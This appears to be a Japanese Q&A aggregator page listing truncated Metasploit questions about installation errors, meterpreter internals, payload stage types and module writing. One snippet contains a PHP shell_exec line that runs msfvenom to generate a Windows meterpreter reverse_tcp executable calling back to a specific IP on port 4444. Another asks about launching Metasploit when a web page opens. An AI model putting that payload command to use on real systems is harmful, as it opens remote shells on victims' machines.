metasploit

    3

    1答えて

    meterpreterの仕組みの詳細な知識を得たいと思います。あなたは次のコマンドでmsfpayloadによって作成されたペイロードの窓/ meterpreter/reverse_typを、分解した場合: $ cat asm_code.asm entrypoint_0: cld ; @0 fc call sub_8fh ; @1 e8890

    -1

    1答えて

    私はmetasploitをUbuntu 16.04にインストールしようとしています。私は、コマンド sudo apt-get install ruby libopenssl-ruby libyaml-ruby libdl-ruby libiconv-ruby libreadline-ruby irb ri rubygems しかし Building dependency tree Read

    -2

    2答えて

    Metasploitは今朝までmsfupdateにアップデートしてから、すべてがうまくいっていました。私が行って、bundle installを入力 Could not find nokogiri-1.6.8 in any of the sources Run bundle install to install missing gems. : msfconsoleを入力すると、今私は、このエ

    -1

    1答えて

    コンピュータやRaspberry Piのような外部デバイスにmetasploitable osをインストールしたいと思います。 は可能ですか? 私はそれをダウンロードしますが、 ".vmdk"形式であり、 ".iso"ではありません。 これをisoに変換するにはどうすればよいですか?または、このOSをコンピュータにインストールするにはどうしたらいいですか? ありがとうございました。私はそれを試して

    -2

    1答えて

    私は基本的なmeterpreter reverse tcpペイロードを生成するPHPスクリプトを作ろうとしています。 <?php $cmd = shell_exec('msfvenom -p windows/meterpreter/reverse_tcp LHOST=46.101.255.58 LPORT=4444 -f exe > payloads/payload.exe'); echo

    -1

    1答えて

    msfconsoleを使用し、Linux x64ペイロードを検索しました。 私はステージャー、ステージ、シングルに出くわしましたか?それらはすべて、 'reverse_tcp'を持っていて、攻撃者に接続を戻します。しかし、私はstager、stage、singlesの違いを調べてみました。私はまだ理解していない。 誰でも自分の違いを説明することができますので、どちらを使いますか?

    2

    1答えて

    私は、ページが開かれてmetasploitを起動するPHPスクリプトを書くのに失敗しています! 私はshell_execとexecと他のすべての選択肢を試しましたが、msfconsoleを試してみると簡単なこと(つまりls、cdsなど)を行うことができますが、何もしません! また、別のスクリプトを試してFirefoxを起動しましたが、何も起こりません! 今、私はphpがサーバ上で動作していることを

    -2

    2答えて

    が見つからない場合は、chmodコマンドが見つからないとわかりますが、chmodがインストールされています。私はターミナルから直接metasploitをインストールしています(私はデスクトップ環境をインストールしておらず、そこからmsfを実行したくありません)。これを解決する方法はありますか?私は喜んですべての応答を感謝します。

    0

    1答えて

    net/httpを使って書かれたfollwing ruby​​コードをmetasploit auxiliaryとして使いたいと思います。 私は1つは簡単にlibrexまたはGSUBを使用してファイルの読み取り/書き込みと文字列操作をサポートする他のMetasploitのAPIのいずれかを、それを変換するために私を助けるかを知りたい: 私のコードがfoloowingさ: require 'net/h